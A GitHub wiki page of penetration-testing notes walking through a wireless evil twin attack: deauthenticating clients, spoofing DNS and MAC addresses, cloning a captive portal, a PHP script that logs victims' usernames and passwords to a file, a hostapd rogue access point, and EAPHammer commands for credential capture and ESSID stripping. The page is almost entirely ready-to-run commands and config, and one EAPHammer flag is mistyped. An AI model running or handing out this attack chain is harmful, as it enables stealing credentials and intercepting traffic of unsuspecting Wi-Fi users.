Wireless Evil Twin Attacks - CraigDonkin/Infrastructure GitHub Wiki

Rogue AP

  • Wireless AP that imitates a legitimate one.
  • Called an Evil Twin

Simplified attack

  • Fake AP
  • Deauth
  • Victim connects
  • Capture traffic/TLS strip/phish with captive portals etc

Detailed attack

Reconnaisance

  • Set interface to monitor mode and scan for WiFi networks
airmon-ng start <interface>
airodump-ng <interface> -w <filename> -c <channel>
  • Identify a connected client and then deauth them to capture the WPA handshake
aireplay-ng --deauth 5 -a <mac address> <interface>
airodump-ng <interface> -w <file>

Configure routing

  • Use dnsmasq with the following dns.conf
interface=wlan1
dhcp-range=192.168.0.2,192.168.0.254,255.255.255.0,10h
dhcp-option=3,192.168.0.1
dhcp-option=6,192.168.0.1
server=8.8.4.4
server=8.8.8.8
listen-address=127.0.0.1
address=/#/192.168.0.1
log-dhcp
log-queries
  • Start dnsmasq
dnsmasq -C dns.conf -d

  • make sure nothing else is running on 53

  • Configure an IP for the interface

ifconfig <interface> <ip>/24
  • Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
  • Change the mac address to be very similar to the target AP
ifconfig <interface> down
macchanger -m <mac> <interface>
ifconfig <interface> up
  • Use DNSSpoof to redirect traffic to our IP
dnsspoof -i <interface>

Setup Captive Portal

  • Enable Apache Rewrite
a2enmod rewrite
  • Edit /etc/apache2/apache2.conf
<Directory />
	Options FollowSymLinks
	AllowOverride All
	Require all denied
</Directory>
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride All
	Require all granted
</Directory>
  • Create .htacces inside /var/www/html
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . index.html [L]
  • Restart Apache
service apache2 restart
  • Clone the captive portal
httrack <url>
  • Direct the form action to received.php
<form action="/received.php" method="POST" class="centered-form">
  • Received.php:
<?php
if(isset($_POST['submit'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $data = $username . ' ' . $password . "\r\n";
    $ret = file_put_contents('passes.lst', $data, FILE_APPEND | LOCK_EX);
    if($ret === false) {
        die('An error has occurred');
    }
    else {
        echo "Thank you for signing in. You will be redirected shortly!";
    }
}
else {
   die('No post data to process');
}
?>
  • Store the fake portal in /var/www/html

Start the Rogue AP

  • create hostapd.conf
interface=wlan1
driver=nl80211
ssid=<SSID>
hw_mode=g
channel=1
auth_algs=1
bssid=<MAC address>
  • Launch the AP:
hostapd hostapd.conf

Allow internet access

  • Once the captive portal has been used we can setup firewall rules to allow internet access
iptables --append POSTROUTING --table nat --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan1 -j ACCEPT

EAPHammer

https://github.com/s0lst1c3/eaphammer https://github.com/s0lst1c3/eaphammer/wiki

Basic use

eaphammer --cert-wizard
eaphammer -i <interface> --channel <channel> --auth wpa-eap --essid <essid> --creds

ESSID Stripping

  • Causes the network name to appear differently in the devices list of networks compared to the actual network name.
  • Uses non printable UTF-8 Chars
\x20 = space
\x00 = Null, will omit chars after it
\t = Add a tab
\r = Add a new line
\n = Add an enter
  • Example:
FreeWifi\x00pentest
  • In EAPHammer create a self signed cert
eaphammer --cert-wizard
  • Start a rogue AP with the ESSID stripping option
eaphammer -i <interface> --uth wpa-eap --essid <essid> --creds --negotiate balanced --essid-stripping '\t'

Airgeddon

https://github.com/v1s1t0r1sh3r3/airgeddon https://github.com/v1s1t0r1sh3r3/airgeddon/wiki

Fluxion

https://github.com/FluxionNetwork/fluxion

⚠️ **GitHub.com Fallback** ⚠️